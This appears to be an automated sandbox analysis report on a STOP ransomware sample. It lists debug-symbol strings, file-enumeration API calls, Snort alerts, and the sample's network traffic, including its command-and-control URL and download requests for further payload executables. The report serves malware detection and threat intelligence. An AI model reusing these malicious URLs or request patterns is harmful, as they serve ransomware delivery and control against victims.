                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\8 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271174046.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279774286.0000000004343000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271963806.0000000004323000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280009044.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\' source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: WINLOA~1.PDBwinload_prod.pdbansferApiGroup source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220259603.00000000041F7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\G source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004174000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288915602.0000000004171000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004179000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289842749.0000000004191000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\3 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbAppCache133408907975188232.txt\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\y.IE5\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271508428.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268742531.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280009044.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281570328.000000000429E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\Pg source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327608090.0000000004613000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281607594.0000000004503000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*d source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\% source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281607594.0000000004555000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304673578.000000000455B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289409280.000000000451B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289789240.0000000004543000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.000000000451A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304545377.000000000454A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\p\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*ta\Nn< source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305033543.0000000004198000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbrogFile_October_3_2023__13_9_20.txtpol source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\V source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315018219.0000000004502000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316096635.0000000004523000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\N source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220586448.0000000003D01000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220855829.0000000003D07000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\b source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280221874.00000000041B4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279813612.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004174000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2282207150.00000000041E3000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004179000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305914874.000000000415F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\2E source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020128101.0000000003D19000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019336815.0000000003D05000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020095647.0000000003D15000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019923625.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*\* source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246554838.0000000003D07000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245102965.0000000003CF9000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245017706.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245433373.0000000003D01000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.vapo source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\< source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\les\\\{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2325989468.0000000004682000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2328255306.000000000468A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2333695957.000000000468A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\#8 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288915602.0000000004171000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00480160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00480160
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0047F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_0047F730
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0047FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,0_2_0047FB98
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0047F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0047F730
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_00480160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00480160
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0047FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0047FB98
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E2F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00E2F730
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E30160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00E30160
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E2FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,3_2_00E2FB98
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E30160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00E30160
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E2F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00E2F730
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E2FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,4_2_00E2FB98

                Networking

                barindex
                Source: TrafficSnort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49732 -> 199.59.242.150:80
                Source: TrafficSnort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49732 -> 199.59.242.150:80
                Source: TrafficSnort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49734 -> 199.59.242.150:80
                Source: Malware configuration extractorURLs: http://zexeq.com/raud/get.php
                Source: Joe Sandbox ViewIP Address: 199.59.242.150 199.59.242.150
                Source: Joe Sandbox ViewIP Address: 199.59.242.150 199.59.242.150
                Source: Joe Sandbox ViewIP Address: 104.21.65.24 104.21.65.24
                Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0047CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_0047CF10
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: global trafficHTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: global trafficHTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
                Source: global trafficHTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
                Source: global trafficHTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
                Source: global trafficHTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
                Source: global trafficHTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
                Source: global trafficHTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
                Source: global trafficHTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1934918395.0000000004120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935241959.0000000004120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935388771.0000000004120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
                Source: unknownDNS traffic detected: queries for: api.2ip.ua
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://colisumy.com/dl/build2.exe
